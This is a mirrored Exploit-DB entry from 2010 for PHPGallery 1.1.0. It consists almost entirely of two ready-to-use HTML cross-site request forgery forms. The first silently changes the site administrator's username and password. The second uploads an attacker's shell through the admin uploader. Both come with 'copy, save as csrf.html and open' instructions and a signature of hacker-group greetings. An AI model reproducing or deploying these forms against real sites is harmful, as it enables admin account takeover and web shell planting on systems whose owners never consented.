PHPGallery 1.1.0 – Cross-Site Request Forgery - 体验盒子

作者： Or4nG.M4N
日期： 2010-11-19
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/15573/
-------------------------------------------------------------------------
# Software: phpgallery v 1.1.0: 
# Author: Or4nG.M4N 
# Date: n/a
# Dork: Forbidden 
# Software Link: http://www.hotscripts.com/listing/phpgallery/:
-------------------------------------------------------------------------
+---+[REMOTE CSRF Change Admin Password by OR4NG.M4N]+---+
<html> 
<head> 
<title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head> 
<body> 
<form action="http://domain/[pwd]/admin/do_change_info.php" method="post"> 
<br> 
<input name="username" id="username" type="text" value="Or4nG" > 
<br> 
<input name="password" id="password" type="password" value="Ro0t" >
<br> 
<input name="submit" onclick="MM_validateForm('username','','R','password','','R');return document.MM_returnValue" value="Submit" type="submit">

how to use: copy This code and seve in file csrf.html > and open Enjoy


+---+[REMOTE CSRF upload ShElL by OR4NG.M4N]+---+ 
<html> 
<head> 
<title>REMOTE CSRF upload ShElL by OR4NG.M4N</head> 
<body>		
 <form enctype="multipart/form-data" action="http://domain/[pwd]/admin/uploader.php" method="POST">
Choose a file to upload to the gallery:<br>
<input name="uploadedfile" type="file" />
<p align="left">Picture Caption:<br> 
<input name="caption" type="text" id="caption" size="45">
<p align="left"> 
<input name="Submit" type="submit" id="Submit" onClick="MM_showHideLayers('loading','','show')" value="Upload File" />

how to use: copy This code and seve in file csrf.html > and open Enjoy

--------------------------------------------------------
# Email - priv8te@hotmail.com
# GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
# P0c TeaM - SarBoT511 - YoU - RGH - MY ]
# Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
---------------------------------------------------------